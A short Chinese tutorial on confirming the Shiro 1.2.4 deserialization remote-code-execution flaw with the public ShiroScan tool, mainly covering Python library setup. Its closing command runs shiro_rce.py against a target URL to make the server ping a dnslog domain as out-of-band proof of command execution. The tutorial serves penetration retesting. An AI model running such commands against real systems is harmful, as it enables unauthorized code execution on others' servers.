简单的Shiro 1.2.4反序列化漏洞验证

前段时间的复测工作中碰到了，后来也有人来问我怎么做其实这并不难测，大佬们都有自己的方法，问了也是让自己百度自己想办法，然而我第一次碰到的时候仍花了很长时间于是提供一种简单快捷的检查方法，如果帮到你了就给文章点个赞吧~

原理什么的就不讲了，直接正题

用这个工具：https://github.com/sv3nbeast/ShiroScan

建议下到windows。需要python3环境。

之后进入文件夹，打开shiro_rce.py，增加如下几个模块：

import os

import re

import base64

import uuid

import subprocess

import requests

from Crypto.Cipher import AES

其中requests和Crypto是第三方库，需要另行安装

pip install requests

Crypto这个库比较邪门。。我用pip install直接安装会各种报错

于是我先卸载掉

pip uninstall Crypto

pip uninstall Cipher

然后装这个

pip install pycryptodome

需要一个dnslog平台，我用的是http://www.dnslog.cn/

cmd下进入ShiroScan的目录

python shiro_rce.py url "ping 4v7o2m.dnslog.cn"

URL就是要测试的目标地址。执行后，回来refresh下看看是否记录了该域名的dns查询记录，即证明目标是否存在命令执行。有，就说明存在漏洞